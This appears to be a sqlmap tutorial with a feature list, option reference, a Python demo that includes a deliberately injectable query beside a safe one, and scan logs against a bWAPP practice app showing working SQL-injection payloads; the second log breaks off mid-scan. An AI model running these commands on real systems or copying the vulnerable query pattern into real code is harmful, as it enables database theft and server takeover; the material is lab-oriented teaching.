sqlmap Usage Guide


sqlmap overview

sqlmap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection flaws and the takeover of database servers. It has a powerful detection engine and many further features, including database fingerprinting, fetching data from the database, accessing the underlying file system, and executing commands on the operating system over out-of-band connections.

sqlmap features

  • Full support for the MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, Informix, MariaDB, MemSQL, TiDB, CockroachDB, HSQLDB, H2, MonetDB, Apache Derby, Amazon Redshift, Vertica, Mckoi, Presto, Altibase, MimerSQL, CrateDB, Greenplum, Drizzle, Apache Ignite, Cubrid, InterSystems Cache, IRIS, eXtremeDB, FrontBase, Raima Database Manager, YugabyteDB and Virtuoso database management systems.

  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.

  • Support to connect directly to the database, without going through a SQL injection, by providing DBMS credentials, IP address, port and database name.

  • Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.

  • Automatic recognition of password hash formats and support for cracking them with a dictionary-based attack.

  • Support to dump database tables entirely, a range of entries, or specific columns, as the user chooses. The user can also choose to dump only a range of characters from each column's entries.

  • Support to search for specific database names, specific tables across all databases, or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials, where the relevant columns' names contain strings such as name and pass.

  • Support to download and upload any file from the database server's underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.

  • Support to execute arbitrary commands and retrieve their standard output on the database server's underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.

  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server's underlying operating system. Depending on the user's choice, this channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session.

  • Support for escalating the database process's user privileges via Metasploit's Meterpreter getsystem command.
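To make the first and fourth of the six techniques listed above concrete, the following Python script is an added example (not part of this guide and not sqlmap's own code). It places a lookup that concatenates the movie parameter into SQL text next to one that validates and binds it, and runs both against payloads adapted from the sqlmap report for sqli_2.php in use case 1 below. The table, its titles and its three-column layout are constructed stand-ins (the real bWAPP schema is not on this page; sqlmap reported 7 columns there), so the NULL count in the UNION payload is reduced to three and the hex-marker CONCAT is replaced by a plain string. SQLite stands in for MySQL, so the time-based SLEEP() payload is not reproduced.

```python
import sqlite3

# Constructed stand-in for the movie lookup behind sqli_2.php?movie=<id>.
# Assumption: the real bWAPP schema is not on the page; this toy table has
# 3 columns, whereas sqlmap reported 7 for the real query.
MOVIES = [
    (1, "Iron Man", 2008),
    (2, "Constructed Title A", 2009),
    (3, "Constructed Title B", 2010),
]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE movies (id INTEGER PRIMARY KEY, title TEXT, year INTEGER)")
    conn.executemany("INSERT INTO movies VALUES (?, ?, ?)", MOVIES)
    return conn

def lookup_vulnerable(conn, movie):
    """String concatenation: whatever is in 'movie' is parsed as SQL text."""
    sql = "SELECT id, title, year FROM movies WHERE id = " + movie
    return conn.execute(sql).fetchall()

def lookup_safe(conn, movie):
    """Type check plus bound parameter: the value is data, never SQL."""
    if not movie.lstrip("-").isdigit():
        return []          # a real handler would answer HTTP 400 here
    sql = "SELECT id, title, year FROM movies WHERE id = ?"
    return conn.execute(sql, (int(movie),)).fetchall()

# Payloads adapted from the sqlmap report for sqli_2.php (use case 1 below).
PAYLOAD_TRUE = "1 AND 8304=8304"    # boolean-based blind: response unchanged
PAYLOAD_FALSE = "1 AND 8304=8305"   # the false twin sqlmap compares it against
PAYLOAD_UNION = "-4573 UNION ALL SELECT NULL,'injected',NULL-- -"  # UNION query

def compare():
    """Run each payload through both lookups and return the result sets."""
    conn = make_db()
    return {
        "baseline":   lookup_vulnerable(conn, "1"),
        "vuln_true":  lookup_vulnerable(conn, PAYLOAD_TRUE),
        "vuln_false": lookup_vulnerable(conn, PAYLOAD_FALSE),
        "vuln_union": lookup_vulnerable(conn, PAYLOAD_UNION),
        "safe_true":  lookup_safe(conn, PAYLOAD_TRUE),
        "safe_union": lookup_safe(conn, PAYLOAD_UNION),
        "safe_plain": lookup_safe(conn, "1"),
    }

if __name__ == "__main__":
    for name, rows in compare().items():
        print(f"{name:11} -> {rows}")
```

The boolean-based blind technique works because the true and false twins produce different pages from the vulnerable lookup (one row versus none), which is the difference sqlmap's --string="Cobra Commander" comparison in use case 1 keys on; the UNION payload adds a row the query never selected. With the bound parameter, both payloads fail the type check before any SQL is issued.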

Commonly used sqlmap options

Target: at least one of these options has to be provided to define the target (the use cases below use -u URL)

Request: these options can be used to specify how to connect to the target URL

  • --cookie=COOKIE  HTTP Cookie header value (e.g. "PHPSESSID=a8d127e…")

  • --random-agent  Use a randomly selected HTTP User-Agent header value

  • --proxy=PROXY  Use a proxy to connect to the target URL

  • --tor  Use the Tor anonymity network

  • --check-tor  Check whether Tor is used properly

Injection: these options can be used to specify which parameters to test, provide custom injection payloads and optional tamper scripts

  • -p TESTPARAMETER  Testable parameter(s)

  • --dbms=DBMS  Force the back-end DBMS to the provided value

Detection: these options can be used to customise the detection phase

  • --level=LEVEL  Level of tests to perform (1-5, default 1)

  • --risk=RISK  Risk of tests to perform (1-3, default 1)

Injection technique options:

  • --technique=TECH..  SQL injection techniques to use (default "BEUSTQ")

Enumeration: these options can be used to enumerate the back-end database management system information, structure and the data contained in its tables

  • -a, --all  Retrieve everything

  • -b, --banner  Retrieve the DBMS banner

  • --current-user  Retrieve the DBMS current user

  • --current-db  Retrieve the DBMS current database

  • --passwords  Enumerate DBMS users' password hashes

  • --tables  Enumerate DBMS database tables

  • --columns  Enumerate DBMS database table columns

  • --schema  Enumerate the DBMS schema

  • --dump  Dump DBMS database table entries

  • --dump-all  Dump all DBMS database table entries

  • -D DB  DBMS database to enumerate

  • -T TBL  DBMS database table(s) to enumerate

  • -C COL  DBMS database table column(s) to enumerate

Operating system access: these options can be used to access the operating system underlying the back-end database management system

  • --os-shell  Prompt for an interactive operating system shell

  • --os-pwn  Prompt for an OOB shell, Meterpreter or VNC

General: these options can be used to set some general working parameters

  • --batch  Never ask for user input, use the default behaviour

  • --flush-session  Flush the session file for the current target

Miscellaneous: these options do not fit into any other category

  • --wizard  Simple wizard interface for beginner users

sqlmap use case 1

Description:

1. Scan the bWAPP - Login injection point, passing the session cookie; all other options are left at their defaults.

2. During the scan, sqlmap prompts for choices about which tests to run.

3. When the scan ends, it prints the results; for each injection point found it prints the injection type and the payload.

sqlmap -u "http://8.142.109.131:8080/sqli_2.php?movie=1&action=go" --cookie="security=low;grafana_session=d98406ee1386e4964189e699f4ab95aa;PHPSESSID=u4bj5utd41l2t7rlgkdje96mf0;security_level=0"

Output of the scan and analysis:

$ sqlmap -u"http://8.142.109.131:8080/sqli_2.php?movie=1&action=go"  --cookie="security=low;grafana_session=d98406ee1386e4964189e699f4ab95aa;PHPSESSID=u4bj5utd41l2t7rlgkdje96mf0;security_level=0"
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6.6#pip}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
​
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
​
[*] starting @ 11:26:54 /2022-06-17/
​
[11:26:54] [INFO] testing connection to the target URL
[11:26:54] [WARNING] potential CAPTCHA protection mechanism detected
[11:26:54] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:26:55] [INFO] testing if the target URL content is stable
[11:26:55] [INFO] target URL content is stable
[11:26:55] [INFO] testing if GET parameter 'movie' is dynamic
[11:26:55] [WARNING] GET parameter 'movie' does not appear to be dynamic
[11:26:55] [INFO] heuristic (basic) test shows that GET parameter 'movie' might be injectable (possible DBMS: 'MySQL')
[11:26:55] [INFO] heuristic (XSS) test shows that GET parameter 'movie' might be vulnerable to cross-site scripting (XSS) attacks
[11:26:55] [INFO] testing for SQL injection on GET parameter 'movie'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[11:28:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:28:35] [WARNING] reflective value(s) found and filtering out
[11:28:36] [INFO] GET parameter 'movie' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Cobra Commander")
[11:28:36] [INFO] testing 'Generic inline queries'
[11:28:36] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[11:28:36] [INFO] GET parameter 'movie' is 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' injectable
[11:28:36] [INFO] testing 'MySQL inline queries'
[11:28:36] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[11:28:36] [WARNING] time-based comparison requires larger statistical model, please wait................... (done)
[11:28:37] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[11:28:38] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[11:28:59] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[11:28:59] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[11:28:59] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[11:28:59] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[11:28:59] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[11:29:00] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:29:10] [INFO] GET parameter 'movie' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[11:29:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:29:10] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:29:10] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:29:10] [INFO] target URL appears to have 7 columns in query
[11:29:11] [INFO] GET parameter 'movie' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'movie' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[11:29:36] [INFO] testing if GET parameter 'action' is dynamic
[11:29:36] [WARNING] GET parameter 'action' does not appear to be dynamic
[11:29:36] [WARNING] heuristic (basic) test shows that GET parameter 'action' might not be injectable
[11:29:36] [INFO] testing for SQL injection on GET parameter 'action'
[11:29:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:29:37] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[11:29:37] [INFO] testing 'Generic inline queries'
[11:29:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[11:29:40] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[11:29:44] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[11:29:47] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[11:29:52] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[11:29:57] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[11:30:01] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[11:30:07] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[11:30:12] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[11:30:17] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[11:30:23] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[11:30:23] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[11:30:23] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[11:30:23] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[11:30:23] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[11:30:24] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[11:30:24] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[11:30:24] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[11:30:25] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[11:30:25] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[11:30:25] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[11:30:28] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[11:30:28] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[11:30:35] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[11:30:38] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[11:30:42] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[11:30:46] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[11:30:49] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[11:30:53] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[11:30:56] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[11:31:00] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:31:04] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:31:07] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:31:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:31:18] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[11:31:22] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[11:31:26] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:31:34] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[11:31:35] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:31:37] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[11:31:37] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[11:31:38] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[11:31:38] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[11:31:38] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[11:31:38] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[11:31:38] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[11:31:38] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[11:31:38] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[11:31:38] [INFO] testing 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)'
[11:31:38] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[11:31:38] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[11:31:39] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[11:31:39] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[11:31:39] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[11:31:39] [INFO] testing 'MySQL inline queries'
[11:31:39] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[11:31:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[11:31:43] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[11:31:45] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[11:31:48] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[11:31:50] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[11:31:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:31:57] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[11:32:00] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[11:32:04] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[11:32:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[11:32:09] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[11:32:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[11:32:14] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[11:32:16] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[11:32:20] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[11:32:24] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK)'
[11:32:28] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query)'
[11:32:31] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment)'
[11:32:35] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query - comment)'
[11:32:37] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)'
[11:32:39] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query - comment)'
[11:32:42] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[11:32:45] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[11:32:48] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[11:32:52] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[11:32:54] [INFO] testing 'MySQL AND time-based blind (ELT)'
[11:32:58] [INFO] testing 'MySQL OR time-based blind (ELT)'
[11:33:03] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[11:33:07] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[11:33:09] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:33:11] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:33:13] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[11:33:13] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[11:33:13] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (BENCHMARK)'
[11:33:13] [INFO] testing 'MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment)'
[11:33:16] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[11:33:16] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[11:33:16] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[11:33:16] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[11:33:16] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (BENCHMARK)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[11:33:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:33:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[11:34:09] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[11:34:33] [WARNING] GET parameter 'action' does not seem to be injectable
sqlmap identified the following injection point(s) with a total of 3858 HTTP(s) requests:
---
Parameter: movie (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: movie=1 AND 8304=8304&action=go
​
    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: movie=1 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170717671,(SELECT (ELT(6100=6100,1))),0x7176706271,0x78))s), 8446744073709551610, 8446744073709551610)))&action=go
​
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: movie=1 AND (SELECT 6517 FROM (SELECT(SLEEP(5)))DXhM)&action=go
​
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: movie=-4573 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170717671,0x6c7642426e6e6d6c76616d6c65767367616c716f7266585344614a47594465704259774f73704c72,0x7176706271),NULL,NULL-- -&action=go
---
[11:34:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9, Apache 2.4.7
back-end DBMS: MySQL >= 5.5
[11:34:33] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\8.142.109.131'
​
[*] ending @ 11:34:33 /2022-06-17/

sqlmap use case 2

Description:

1. Scan the bWAPP - Login injection point, passing the session cookie and specifying the database type as mysql.

2. During the scan, sqlmap prompts for choices about which tests to run; sensible choices narrow the scan.

3. When the scan ends, it prints the results; for each injection point found it prints the injection type and the payload.

sqlmap -u "http://8.142.109.131:8080/sqli_1.php?title=Iron+Man&action=search" -D "mysql" --cookie="security=low;grafana_session=d98406ee1386e4964189e699f4ab95aa;PHPSESSID=u4bj5utd41l2t7rlgkdje96mf0;security_level=0"

Note: -D mysql selects the database named mysql for enumeration (see the -D option above); forcing the back-end DBMS type, as described in step 1, is what --dbms=mysql does.

Output of the scan and analysis:

$ sqlmap -u"http://8.142.109.131:8080/sqli_1.php?title=Iron+Man&action=search" -D "mysql" --cookie="security=low;grafana_session=d98406ee1386e4964189e699f4ab95aa;PHPSESSID=u4bj5utd41l2t7rlgkdje96mf0;security_level=0"
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.6.6#pip}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
​
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
​
[*] starting @ 18:10:49 /2022-06-16/
​
[18:10:49] [INFO] testing connection to the target URL
[18:10:51] [WARNING] potential CAPTCHA protection mechanism detected
[18:10:51] [INFO] testing if the target URL content is stable
[18:10:51] [INFO] target URL content is stable
[18:10:51] [INFO] testing if GET parameter 'title' is dynamic
[18:10:52] [WARNING] GET parameter 'title' does not appear to be dynamic
[18:10:52] [INFO] heuristic (basic) test shows that GET parameter 'title' might be injectable (possible DBMS: 'MySQL')
[18:10:52] [INFO] heuristic (XSS) test shows that GET parameter 'title' might be vulnerable to cross-site scripting (XSS) attacks
[18:10:52] [INFO] testing for SQL injection on GET parameter 'title'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[18:11:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:11:52] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[18:11:53] [WARNING] reflective value(s) found and filtering out
[18:11:53] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:11:54] [INFO] testing 'Generic inline queries'
[18:11:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:11:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:12:03] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[18:12:04] [INFO] GET parameter 'title' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable (with --not-string="Z")
[18:12:04] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[18:12:04] [INFO] GET parameter 'title' is 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' injectable
[18:12:04] [INFO] testing 'MySQL inline queries'
[18:12:04] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[18:12:04] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[18:12:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[18:12:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[18:12:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[18:12:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[18:12:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:12:15] [INFO] GET parameter 'title' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[18:12:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:12:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[18:12:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:12:16] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[18:12:16] [INFO] target URL appears to have 7 columns in query
[18:12:16] [INFO] GET parameter 'title' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[18:12:16] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'title' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[18:12:53] [INFO] testing if GET parameter 'action' is dynamic
[18:12:53] [WARNING] GET parameter 'action' does not appear to be dynamic
[18:12:53] [WARNING] heuristic (basic) test shows that GET parameter 'action' might not be injectable
[18:12:53] [INFO] testing for SQL injection on GET parameter 'action'
[18:12:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:12:54] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:12:54] [INFO] testing 'Generic inline queries'
[18:12:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:12:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[18:13:03] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[18:13:08] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:13:16] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[18:13:24] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[18:13:31] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[18:13:40] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[18:13:47] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[18:13:55] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[18:14:02] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[18:14:02] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[18:14:02] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[18:14:03] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[18:14:03] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[18:14:03] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[18:14:03] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
